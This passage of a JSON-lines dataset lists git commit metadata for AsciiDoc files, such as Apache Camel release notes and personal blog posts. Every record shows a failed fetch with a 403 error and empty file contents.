requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fbda4e8c9f8b3a26a14184781dabc0b1d9c4c65d","subject":"Update 2016-10-14-Try-Line-Notify.adoc","message":"Update 2016-10-14-Try-Line-Notify.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bc4b2f824c2e681cd95bc5be274afc7fa32fc2d3","subject":"Update 2017-01-06-vultrandlaravel.adoc","message":"Update 2017-01-06-vultrandlaravel.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-06-vultrandlaravel.adoc","new_file":"_posts\/2017-01-06-vultrandlaravel.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f26f5cde8808f69c3135b55badeca52b86b3e8b3","subject":"Added Camel 2.18.0 release notes to docs","message":"Added Camel 2.18.0 release notes to 
docs\n","repos":"pmoerenhout\/camel,adessaigne\/camel,anoordover\/camel,pax95\/camel,christophd\/camel,tadayosi\/camel,jamesnetherton\/camel,onders86\/camel,nikhilvibhav\/camel,nicolaferraro\/camel,tadayosi\/camel,sverkera\/camel,pax95\/camel,Fabryprog\/camel,mcollovati\/camel,kevinearls\/camel,objectiser\/camel,sverkera\/camel,kevinearls\/camel,objectiser\/camel,nikhilvibhav\/camel,sverkera\/camel,Fabryprog\/camel,punkhorn\/camel-upstream,pmoerenhout\/camel,nicolaferraro\/camel,jamesnetherton\/camel,adessaigne\/camel,onders86\/camel,pmoerenhout\/camel,tadayosi\/camel,ullgren\/camel,ullgren\/camel,anoordover\/camel,apache\/camel,tadayosi\/camel,onders86\/camel,sverkera\/camel,pmoerenhout\/camel,tdiesler\/camel,anoordover\/camel,CodeSmell\/camel,apache\/camel,pax95\/camel,onders86\/camel,zregvart\/camel,cunningt\/camel,pax95\/camel,tadayosi\/camel,CodeSmell\/camel,christophd\/camel,punkhorn\/camel-upstream,nikhilvibhav\/camel,tdiesler\/camel,christophd\/camel,adessaigne\/camel,gnodet\/camel,apache\/camel,sverkera\/camel,DariusX\/camel,anoordover\/camel,apache\/camel,cunningt\/camel,ullgren\/camel,apache\/camel,tdiesler\/camel,zregvart\/camel,pmoerenhout\/camel,jamesnetherton\/camel,objectiser\/camel,DariusX\/camel,tdiesler\/camel,christophd\/camel,kevinearls\/camel,CodeSmell\/camel,gnodet\/camel,DariusX\/camel,pmoerenhout\/camel,kevinearls\/camel,tdiesler\/camel,zregvart\/camel,jamesnetherton\/camel,adessaigne\/camel,cunningt\/camel,DariusX\/camel,pax95\/camel,kevinearls\/camel,tdiesler\/camel,gnodet\/camel,punkhorn\/camel-upstream,alvinkwekel\/camel,nicolaferraro\/camel,objectiser\/camel,sverkera\/camel,christophd\/camel,mcollovati\/camel,zregvart\/camel,mcollovati\/camel,nicolaferraro\/camel,apache\/camel,christophd\/camel,adessaigne\/camel,Fabryprog\/camel,gnodet\/camel,gnodet\/camel,cunningt\/camel,alvinkwekel\/camel,onders86\/camel,CodeSmell\/camel,jamesnetherton\/camel,anoordover\/camel,davidkarlsen\/camel,jamesnetherton\/camel,pax95\/camel,davidkarlsen\/camel,anoordover\/camel,kevinearls\/camel,Fabryprog\/camel,davidkarlsen\/camel,davidkarlsen\/camel,alvinkwekel\/camel,punkhorn\/camel-upstream,tadayosi\/camel,nikhilvibhav\/camel,cunningt\/camel,alvinkwekel\/camel,onders86\/camel,adessaigne\/camel,ullgren\/camel,mcollovati\/camel,cunningt\/camel","old_file":"docs\/user-manual\/en\/release-notes\/camel-2180-release.adoc","new_file":"docs\/user-manual\/en\/release-notes\/camel-2180-release.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f3a24bc8d6605ed64c4c9704aada2bee1b3013b6","subject":"Add release notes for Camel 2.23.2","message":"Add release notes for Camel 2.23.2\n\nSigned-off-by: Gregor Zurowski 
<5fdc67d2166bcdd1d3aa4ed45ea5a25e9b21bc20@zurowski.org>\n","repos":"pax95\/camel,pmoerenhout\/camel,tadayosi\/camel,objectiser\/camel,ullgren\/camel,objectiser\/camel,zregvart\/camel,tadayosi\/camel,ullgren\/camel,christophd\/camel,christophd\/camel,adessaigne\/camel,Fabryprog\/camel,tdiesler\/camel,CodeSmell\/camel,DariusX\/camel,Fabryprog\/camel,mcollovati\/camel,gnodet\/camel,ullgren\/camel,CodeSmell\/camel,pmoerenhout\/camel,zregvart\/camel,apache\/camel,objectiser\/camel,cunningt\/camel,nikhilvibhav\/camel,gnodet\/camel,apache\/camel,alvinkwekel\/camel,nicolaferraro\/camel,tadayosi\/camel,christophd\/camel,mcollovati\/camel,nikhilvibhav\/camel,Fabryprog\/camel,mcollovati\/camel,davidkarlsen\/camel,nikhilvibhav\/camel,tadayosi\/camel,Fabryprog\/camel,pax95\/camel,christophd\/camel,apache\/camel,gnodet\/camel,tdiesler\/camel,alvinkwekel\/camel,pax95\/camel,zregvart\/camel,DariusX\/camel,nicolaferraro\/camel,cunningt\/camel,nicolaferraro\/camel,tdiesler\/camel,DariusX\/camel,zregvart\/camel,adessaigne\/camel,tdiesler\/camel,ullgren\/camel,gnodet\/camel,pmoerenhout\/camel,pmoerenhout\/camel,adessaigne\/camel,objectiser\/camel,alvinkwekel\/camel,tdiesler\/camel,alvinkwekel\/camel,nikhilvibhav\/camel,tadayosi\/camel,pax95\/camel,pmoerenhout\/camel,adessaigne\/camel,mcollovati\/camel,nicolaferraro\/camel,cunningt\/camel,adessaigne\/camel,CodeSmell\/camel,tdiesler\/camel,cunningt\/camel,pax95\/camel,DariusX\/camel,pax95\/camel,pmoerenhout\/camel,cunningt\/camel,adessaigne\/camel,gnodet\/camel,cunningt\/camel,tadayosi\/camel,davidkarlsen\/camel,davidkarlsen\/camel,apache\/camel,apache\/camel,christophd\/camel,CodeSmell\/camel,davidkarlsen\/camel,christophd\/camel,apache\/camel","old_file":"docs\/user-manual\/en\/release-notes\/camel-2232-release.adoc","new_file":"docs\/user-manual\/en\/release-notes\/camel-2232-release.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fbb778730f8392fcd09e85cebfa36911d220fda5","subject":"added simple readme explaining tools dir contents","message":"added simple readme explaining tools dir contents\n","repos":"HuangLS\/neo4j,HuangLS\/neo4j,HuangLS\/neo4j,HuangLS\/neo4j,HuangLS\/neo4j","old_file":"packaging\/tools\/README.asciidoc","new_file":"packaging\/tools\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/HuangLS\/neo4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"864ead9155c9b2f988be0872763a46d75f883020","subject":"add README-es File","message":"add README-es File\n","repos":"anthonny\/dev.hubpress.io,anthonny\/dev.hubpress.io,Git-Host\/Git-Host.io,demo-hubpress\/demo-hubpress.github.io,TheAshwanik\/new,Git-Host\/Git-Host.io,alchapone\/alchapone.github.io,Git-Host\/Git-Host.io,alchapone\/alchapone.github.io,demo-hubpress\/demo-hubpress.github.io,TheAshwanik\/new,anthonny\/dev.hubpress.io,anthonny\/dev.hubpress.io,TheAshwanik\/new,demo-hubpress\/demo-hubpress.github.io,lametaweb\/lametaweb.github.io,demo-hubpress\/demo-hubpress.github.io,lametaweb\/lametaweb.github.io,TheAshwanik\/new,demo-hubpress\/demo-hubpress.github.io,anthonny\/dev.hubpress.io,lametaweb\/lametaweb.github.io,alchapone\/alchapone.github.io","old_file":"docs\/README-es.adoc","new_file":"docs\/README-es.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: 
unable to access 'https:\/\/github.com\/demo-hubpress\/demo-hubpress.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c1ab28ed3c74563de3fa5385c658f3bf35ee8ebc","subject":"Update 2017-09-15-How-to-be-a-yogi.adoc","message":"Update 2017-09-15-How-to-be-a-yogi.adoc","repos":"sidmusa\/sidmusa.github.io,sidmusa\/sidmusa.github.io,sidmusa\/sidmusa.github.io,sidmusa\/sidmusa.github.io","old_file":"_posts\/2017-09-15-How-to-be-a-yogi.adoc","new_file":"_posts\/2017-09-15-How-to-be-a-yogi.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sidmusa\/sidmusa.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b6d37c5c8e48707aded515325353a65a7a631267","subject":"Update 2019-01-31-My-English-Title.adoc","message":"Update 2019-01-31-My-English-Title.adoc","repos":"gtugablue\/gtugablue.github.io,gtugablue\/gtugablue.github.io","old_file":"_posts\/2019-01-31-My-English-Title.adoc","new_file":"_posts\/2019-01-31-My-English-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gtugablue\/gtugablue.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d553d0bb6c0bccec3c46905f57ac82eb25e525ff","subject":"Update 2019-01-31-My-English-Title.adoc","message":"Update 2019-01-31-My-English-Title.adoc","repos":"igovsol\/blog,igovsol\/blog,igovsol\/blog,igovsol\/blog","old_file":"_posts\/2019-01-31-My-English-Title.adoc","new_file":"_posts\/2019-01-31-My-English-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/igovsol\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2e0ea9d46ea717ea3637c9d34a27747fcb40063c","subject":"Update 2016-06-18-Euro-Watching-Engineering.adoc","message":"Update 2016-06-18-Euro-Watching-Engineering.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-18-Euro-Watching-Engineering.adoc","new_file":"_posts\/2016-06-18-Euro-Watching-Engineering.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cd72bea34e11477cee97932084c7cd743f6c8ba6","subject":"Update 2013-06-03-Eclipse-ameliorer-laide-a-la-saisie.adoc","message":"Update 2013-06-03-Eclipse-ameliorer-laide-a-la-saisie.adoc","repos":"jabby\/jabby.github.io,jabby\/jabby.github.io,jabby\/jabby.github.io","old_file":"_posts\/2013-06-03-Eclipse-ameliorer-laide-a-la-saisie.adoc","new_file":"_posts\/2013-06-03-Eclipse-ameliorer-laide-a-la-saisie.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jabby\/jabby.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e584418e4d3da5b4821bb8db2cabab5675683612","subject":"Update 2017-09-11-nativescript-and-wordpress-rest-api.adoc","message":"Update 
2017-09-11-nativescript-and-wordpress-rest-api.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-11-nativescript-and-wordpress-rest-api.adoc","new_file":"_posts\/2017-09-11-nativescript-and-wordpress-rest-api.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"38ceb8b9783be5777d853d8bd11061be1aeb67c8","subject":"Update 2016-03-31-Decompile-me-basic.adoc","message":"Update 2016-03-31-Decompile-me-basic.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-31-Decompile-me-basic.adoc","new_file":"_posts\/2016-03-31-Decompile-me-basic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9ff667ff92942837364220beaa6eadad42bcbff5","subject":"Update 2017-01-13-memo-like-asciidoc.adoc","message":"Update 2017-01-13-memo-like-asciidoc.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-13-memo-like-asciidoc.adoc","new_file":"_posts\/2017-01-13-memo-like-asciidoc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f1b52db593acc4b25da9b7cb76492ca770613f98","subject":"Update 2017-10-16-My-First-Blog-Post.adoc","message":"Update 2017-10-16-My-First-Blog-Post.adoc","repos":"SockPastaRock\/hubpress.io,SockPastaRock\/hubpress.io,SockPastaRock\/hubpress.io,SockPastaRock\/hubpress.io","old_file":"_posts\/2017-10-16-My-First-Blog-Post.adoc","new_file":"_posts\/2017-10-16-My-First-Blog-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SockPastaRock\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7b935137ed70e95106e5d4dac024e7aa9f36041f","subject":"Update 2017-12-10-A-story-of-a-story.adoc","message":"Update 2017-12-10-A-story-of-a-story.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2017-12-10-A-story-of-a-story.adoc","new_file":"_posts\/2017-12-10-A-story-of-a-story.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7290d413e0041baf156252cf6e8e86e8e7902419","subject":"Update 2016-06-02-Word-Press-2.adoc","message":"Update 
2016-06-02-Word-Press-2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-02-Word-Press-2.adoc","new_file":"_posts\/2016-06-02-Word-Press-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"44a10cd8488a1a3f4298efd0b4e097ff38a597fa","subject":"Update 2018-09-04-vr-comic.adoc","message":"Update 2018-09-04-vr-comic.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-04-vr-comic.adoc","new_file":"_posts\/2018-09-04-vr-comic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e6c48ca011dbaed8655f8253c198b4d7f90e28c0","subject":"Update 2016-06-10-programming-study.adoc","message":"Update 2016-06-10-programming-study.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-10-programming-study.adoc","new_file":"_posts\/2016-06-10-programming-study.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aa7140f39a81a53be78d40002b875e79383cea9b","subject":"Fixes documentation glitch","message":"Fixes documentation glitch\n\nresolves #827\n","repos":"cbornet\/springfox,kevinconaway\/springfox,kevinconaway\/springfox,vmarusic\/springfox,thomsonreuters\/springfox,namkee\/springfox,maksimu\/springfox,cbornet\/springfox,zorosteven\/springfox,arshadalisoomro\/springfox,arshadalisoomro\/springfox,namkee\/springfox,thomsonreuters\/springfox,springfox\/springfox,yelhouti\/springfox,wjc133\/springfox,springfox\/springfox,vmarusic\/springfox,jlstrater\/springfox,acourtneybrown\/springfox,springfox\/springfox,choiapril6\/springfox,maksimu\/springfox,thomasdarimont\/springfox,zhiqinghuang\/springfox,wjc133\/springfox,izeye\/springfox,cbornet\/springfox,thomasdarimont\/springfox,choiapril6\/springfox,wjc133\/springfox,kevinconaway\/springfox,izeye\/springfox,yelhouti\/springfox,RobWin\/springfox,namkee\/springfox,erikthered\/springfox,erikthered\/springfox,thomasdarimont\/springfox,choiapril6\/springfox,springfox\/springfox,zorosteven\/springfox,zorosteven\/springfox,acourtneybrown\/springfox,vmarusic\/springfox,izeye\/springfox,yelhouti\/springfox,zhiqinghuang\/springfox,acourtneybrown\/springfox,zhiqinghuang\/springfox,RobWin\/springfox,erikthered\/springfox,arshadalisoomro\/springfox,maksimu\/springfox,jlstrater\/springfox,thomsonreuters\/springfox,RobWin\/springfox,jlstrater\/springfox","old_file":"asciidoc\/current-documentation.adoc","new_file":"asciidoc\/current-documentation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/springfox\/springfox.git\/': The requested URL returned error: 
403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0ff657c1b82b1d943c888528151bf9fb967869a5","subject":"Add blog post on using OpenSSL","message":"Add blog post on using OpenSSL\n","repos":"stuartwdouglas\/wildfly.org,stuartwdouglas\/wildfly.org,stuartwdouglas\/wildfly.org,stuartwdouglas\/wildfly.org","old_file":"news\/2017-10-06-OpenSSL-Support-In-Wildfly.adoc","new_file":"news\/2017-10-06-OpenSSL-Support-In-Wildfly.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/stuartwdouglas\/wildfly.org.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"68cbfc3f963a3cbde4008e7945a1a45b42ad5bd6","subject":"Create 2019-12-09-forge-3.9.5.final.asciidoc","message":"Create 2019-12-09-forge-3.9.5.final.asciidoc","repos":"forge\/docs,forge\/docs","old_file":"news\/2019-12-09-forge-3.9.5.final.asciidoc","new_file":"news\/2019-12-09-forge-3.9.5.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/forge\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"3a6c85956aac0f86d89f1f1efdd8ae11732aef70","subject":"new release post","message":"new release post\n","repos":"docToolchain\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain","old_file":"src\/docs\/030_news\/2021\/2.0.3-release.adoc","new_file":"src\/docs\/030_news\/2021\/2.0.3-release.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/docToolchain\/docToolchain.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8ea8d0e032edadcc6e857dba18b0f3bcd6b65085","subject":"added readme","message":"added readme\n","repos":"teacurran\/java-experiments,teacurran\/java-experiments","old_file":"wildfly-jms-cluster\/README.adoc","new_file":"wildfly-jms-cluster\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/teacurran\/java-experiments.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d7169359b0bccceccc58d14510aaceaf33fb785f","subject":"Update 2016-09-23-wtf-log.adoc","message":"Update 2016-09-23-wtf-log.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-23-wtf-log.adoc","new_file":"_posts\/2016-09-23-wtf-log.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5ea386dad975ae707299bc04469aa6861d6aee25","subject":"Update 2017-11-23-Azure-8.adoc","message":"Update 2017-11-23-Azure-8.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-23-Azure-8.adoc","new_file":"_posts\/2017-11-23-Azure-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"d7782e7cb53835b6aa674bf90690336229b13f1d","subject":"Update 2018-08-21-absence.adoc","message":"Update 2018-08-21-absence.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2018-08-21-absence.adoc","new_file":"_posts\/2018-08-21-absence.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5cab7da4b723a4e7fa6f8927982f54c9fd5f2414","subject":"MAN page of the phpreflect(1) command","message":"MAN page of the phpreflect(1) command\n","repos":"remicollet\/php-reflect,llaville\/php-reflect","old_file":"docs\/phpreflect.1.asciidoc","new_file":"docs\/phpreflect.1.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/remicollet\/php-reflect.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"689e9502e62bbe56e45322aaeca36d1959fed72f","subject":"Added release notes for Camel 2.17.2 to docs","message":"Added release notes for Camel 2.17.2 to docs\n","repos":"DariusX\/camel,davidkarlsen\/camel,apache\/camel,tadayosi\/camel,tdiesler\/camel,christophd\/camel,sverkera\/camel,christophd\/camel,sverkera\/camel,objectiser\/camel,tdiesler\/camel,ullgren\/camel,sverkera\/camel,kevinearls\/camel,cunningt\/camel,ullgren\/camel,pmoerenhout\/camel,cunningt\/camel,kevinearls\/camel,mcollovati\/camel,jamesnetherton\/camel,CodeSmell\/camel,adessaigne\/camel,anoordover\/camel,onders86\/camel,onders86\/camel,kevinearls\/camel,tadayosi\/camel,gnodet\/camel,nikhilvibhav\/camel,tdiesler\/camel,alvinkwekel\/camel,jamesnetherton\/camel,adessaigne\/camel,adessaigne\/camel,gnodet\/camel,zregvart\/camel,onders86\/camel,punkhorn\/camel-upstream,alvinkwekel\/camel,Fabryprog\/camel,nicolaferraro\/camel,alvinkwekel\/camel,sverkera\/camel,pmoerenhout\/camel,pmoerenhout\/camel,mcollovati\/camel,nikhilvibhav\/camel,adessaigne\/camel,objectiser\/camel,davidkarlsen\/camel,CodeSmell\/camel,DariusX\/camel,nicolaferraro\/camel,pax95\/camel,apache\/camel,adessaigne\/camel,CodeSmell\/camel,pax95\/camel,alvinkwekel\/camel,pax95\/camel,zregvart\/camel,zregvart\/camel,Fabryprog\/camel,jamesnetherton\/camel,apache\/camel,pax95\/camel,jamesnetherton\/camel,objectiser\/camel,onders86\/camel,kevinearls\/camel,adessaigne\/camel,CodeSmell\/camel,cunningt\/camel,tadayosi\/camel,Fabryprog\/camel,mcollovati\/camel,nikhilvibhav\/camel,davidkarlsen\/camel,onders86\/camel,onders86\/camel,christophd\/camel,tadayosi\/camel,apache\/camel,pmoerenhout\/camel,ullgren\/camel,DariusX\/camel,cunningt\/camel,apache\/camel,Fabryprog\/camel,nicolaferraro\/camel,sverkera\/camel,punkhorn\/camel-upstream,cunningt\/camel,christophd\/camel,sverkera\/camel,pmoerenhout\/camel,davidkarlsen\/camel,mcollovati\/camel,pmoerenhout\/camel,kevinearls\/camel,DariusX\/camel,objectiser\/camel,pax95\/camel,tdiesler\/camel,gnodet\/camel,christophd\/camel,anoordover\/camel,tadayosi\/camel,tdiesler\/camel,pax95\/camel,jamesnetherton\/camel,cunningt\/camel,apache\/camel,anoordover\/camel,punkhorn\/camel-upstream,anoordover\/camel,nikhilvibhav\/camel,kevinearls\/camel,punkhorn\/camel-upstream,nicolaferraro\/camel,anoordover\/camel,jamesnetherton\/camel,tdiesler\/camel,zregvart\/camel,gnodet\/camel,tadayosi\/camel,ullgren\/camel,christophd\/camel,gnodet\
/camel,anoordover\/camel","old_file":"docs\/user-manual\/en\/release-notes\/camel-2172-release.adoc","new_file":"docs\/user-manual\/en\/release-notes\/camel-2172-release.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9e0009c7c029f48b23609c7729a662ad130332eb","subject":"Update 2015-02-20-Mistaken-Million.adoc","message":"Update 2015-02-20-Mistaken-Million.adoc","repos":"fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io","old_file":"_posts\/2015-02-20-Mistaken-Million.adoc","new_file":"_posts\/2015-02-20-Mistaken-Million.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fqure\/fqure.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1658498d0fa6cb1d9727d6d889361aea4d921180","subject":"Update 2016-6-26-PHPER-array-merge.adoc","message":"Update 2016-6-26-PHPER-array-merge.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-26-PHPER-array-merge.adoc","new_file":"_posts\/2016-6-26-PHPER-array-merge.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"22d6bbe4e96cb759c3207aea207a78c29db2d850","subject":"Update 2017-09-06-Generate-SSH-Key.adoc","message":"Update 2017-09-06-Generate-SSH-Key.adoc","repos":"alimasyhur\/alimasyhur.github.io,alimasyhur\/alimasyhur.github.io,alimasyhur\/alimasyhur.github.io,alimasyhur\/alimasyhur.github.io","old_file":"_posts\/2017-09-06-Generate-SSH-Key.adoc","new_file":"_posts\/2017-09-06-Generate-SSH-Key.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alimasyhur\/alimasyhur.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1b132b0d8ee9c3b5c7c5f26402ada4639a3afa64","subject":"Renamed '_posts\/2017-08-22.adoc' to '_posts\/2017-05-22.adoc'","message":"Renamed '_posts\/2017-08-22.adoc' to '_posts\/2017-05-22.adoc'","repos":"SRTjiawei\/SRTjiawei.github.io,SRTjiawei\/SRTjiawei.github.io,SRTjiawei\/SRTjiawei.github.io,SRTjiawei\/SRTjiawei.github.io","old_file":"_posts\/2017-05-22.adoc","new_file":"_posts\/2017-05-22.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SRTjiawei\/SRTjiawei.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ef4347bdae99ef5e72fc861e81f0317b2294fc32","subject":"Renamed '_posts\/2016-02-04-Inception.adoc' to '_posts\/2016-01-01-Inception.adoc'","message":"Renamed '_posts\/2016-02-04-Inception.adoc' to '_posts\/2016-01-01-Inception.adoc'","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2016-01-01-Inception.adoc","new_file":"_posts\/2016-01-01-Inception.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 
